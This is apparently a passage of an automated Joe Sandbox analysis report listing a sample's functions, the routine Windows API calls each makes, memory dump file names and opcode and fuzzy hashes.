                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$FullNamePath
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 268959451-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 105cbef846006cf02cde67ae9e4c7cf29f52b92e2ace2c8029c8f3f8c5f510d6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 26c26e31dbfa5789fa7ffa6f0677ffca467395647ba22444765d67a27e97b068
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 105cbef846006cf02cde67ae9e4c7cf29f52b92e2ace2c8029c8f3f8c5f510d6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7313A3910020DEBCB28DF68C8559BBB3B5EF84304769855DEB06E7250EBB1AE41C750
                                                                                                                                                                                                                                                                                                                                                      Function 00EEC570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00EEC5BD
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EEC5C4
                                                                                                                                                                                                                                                                                                                                                      • _setjmp3.MSVCRT ref: 00EEC630
                                                                                                                                                                                                                                                                                                                                                      • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 00EEC69D
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2613391085-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 88626bec04334ad911815d271a4c5d7582829882f0e086e8d61d452c5ed1fb49
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e271a36c833992f8a4b9f1b5eabc348fc0759f368d59dfad34aa3083482d3a12
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88626bec04334ad911815d271a4c5d7582829882f0e086e8d61d452c5ed1fb49
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C331D271A0424D8BDB10DF79EC447AA7BF5F744708F26A029E809E7390EB749C46EB91
                                                                                                                                                                                                                                                                                                                                                      Function 00F063F3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,?,?,00EFBFD6,?,?,?,?,?,?,?,?), ref: 00F064D4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF72EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00EE1028,?,?,?,00EFF12E,00F0CA50,00000018,00EF1E7C,00000000,00000000,00EFACE0,00000000,00000000,?,00000104,?), ref: 00EF7314
                                                                                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00EFBFD6), ref: 00F0646C
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00EFBFD6), ref: 00F06474
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00EFBFD6), ref: 00F064B6
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 129137517-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: eb797040ecb9df6ed1a9a9e04fc8c2928c856bc3c989596a4c173f91fd74a984
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6280ad059a46352507b5f962c6c41eeeb383cb1f61c72bc1ae26c4bd3916f299
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb797040ecb9df6ed1a9a9e04fc8c2928c856bc3c989596a4c173f91fd74a984
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9521387AA00209ABC724FF748C5597F779ADF843607184518F906E72D1EE749D16F2A0
                                                                                                                                                                                                                                                                                                                                                      Function 00EF2960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF2977
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF2987
                                                                                                                                                                                                                                                                                                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00EEE559,?,?,00000000,?), ref: 00EF29FF
                                                                                                                                                                                                                                                                                                                                                      • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00EEE559,?,?,00000000,?), ref: 00EF2A09
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4273384694-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 959b0c025626c7761d1a88286ac9354e97add0400e8ab0051a501abf5ce72823
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0a9d194fd42eb5c3afb94ea43eaefaf691f71f4b7db91404ff47aae1d7778bbf
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 959b0c025626c7761d1a88286ac9354e97add0400e8ab0051a501abf5ce72823
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D511E43280051EBB87225F788D08DBABA68FF81358B15121CEB01FB550D3A9ED50E6F4
                                                                                                                                                                                                                                                                                                                                                      Function 00F0C535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C56B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00F0C5A5
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0C5BD
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 00F0C5DA
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1029679093-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9ec3d20ab0dd8e20048405e9f3bd833b6b6b2b8e5c4997659b394a7f033f9ca0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 24783f406bb209fcac5a4922ea2f46fc766327038a6ee0b1d4c29bfc9eff551a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ec3d20ab0dd8e20048405e9f3bd833b6b6b2b8e5c4997659b394a7f033f9ca0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D216632B001095BDB20DBA5DCC5BBFBBF8EF44354F080569A605E3181D674EA44AAA1
                                                                                                                                                                                                                                                                                                                                                      Function 00EF4C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 557e9159feae8441d0e71b4b025cd71a1788152f4208369cb8b3af98fe290d17
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ab79b9a4302171615d22642315ad2ab4b44e381bc7261f441369fd27be1807e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 557e9159feae8441d0e71b4b025cd71a1788152f4208369cb8b3af98fe290d17
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111E2B1A01508BBDB249B259C8AFBE7669EFC1334F144119E802D61D0DF70DD02F791
                                                                                                                                                                                                                                                                                                                                                      Function 00F09809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F09822
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F092EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0982A
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F09841
                                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00F0986E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 15a0e2a6ccd1e10e670c46bcf1565b4642b5a0bd714208c6df0b4dc8c60a74bf
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2ae95fb0636e2c764980d4c832a37bf7dc60fdda7c44b3369850734598eba471
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15a0e2a6ccd1e10e670c46bcf1565b4642b5a0bd714208c6df0b4dc8c60a74bf
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8112B31508208AFDF259B21EC49EBF77A9EB85725F15C029F401D22E2EBB09C41FA61
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7221 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00F09962,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE727F
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EE7286
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00EE72AF
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EE72B6
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 85b74421905de3af044abfe98c8fd008d225f8e50f246397ce44f40c0f2ecd7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8f5e769c25fc9b7e2a446cf0a2ccf48cf2f7ab22a511e84dd842c2dbc04287d2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85b74421905de3af044abfe98c8fd008d225f8e50f246397ce44f40c0f2ecd7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94115EB12096848BC724AF769805B763FE5EF89314F14540CF2DADB2A1DB34D803EB61
                                                                                                                                                                                                                                                                                                                                                      Function 00EE62C8 Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00EE6231,00000000,00000000,55099697), ref: 00EE630C
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE6313
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8535fd4ead3fe021071a1f432947cdb0f3862b9fefe9d5294db44655cf1e0881
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 754b5ff1aa1301b2e3751a077edd26c7aee7ac38a42457084ab5839c6d946998
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8535fd4ead3fe021071a1f432947cdb0f3862b9fefe9d5294db44655cf1e0881
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 471188313019A843CA245B136814B7F7746EFE4BE4F09102CE906BB290CF209C03A692
                                                                                                                                                                                                                                                                                                                                                      Function 00EEDD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00EEBDB3,00000000,?), ref: 00EEDD37
                                                                                                                                                                                                                                                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EEDD3E
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00EEDD53
                                                                                                                                                                                                                                                                                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EEDD5A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 39662ce985559452fb44aef533bdc7f981d099201ca6b64317121a81f620a70b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 90900ae1bf8898c5993bb57014adc7cc81eaf02a0db874c67bd32125f77a4d5d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39662ce985559452fb44aef533bdc7f981d099201ca6b64317121a81f620a70b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E01287620924D9BC7219B52EC88FD97769FBC076AF205125F505E7050DB71CC15DBA0
                                                                                                                                                                                                                                                                                                                                                      Function 00F08496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084B9
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084C6
                                                                                                                                                                                                                                                                                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084EA
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084F2
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1033415088-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6bbbaae3e21717de01400c8016e0999b5341bd35573550dc18eb644c402920db
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fb42589b7090159a8df7f299d7c9b1275d7916f4a2a1b82b9208b04dbb3d75ca
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bbbaae3e21717de01400c8016e0999b5341bd35573550dc18eb644c402920db
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6014F72A0011DAFCB14DBB89C859FFBBECEF0D350B000129F912E2191EA249D06E769
                                                                                                                                                                                                                                                                                                                                                      Function 00EF5643 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF0060: wcschr.MSVCRT ref: 00EF006C
                                                                                                                                                                                                                                                                                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00EF5678
                                                                                                                                                                                                                                                                                                                                                      • _open_osfhandle.MSVCRT ref: 00EF568C
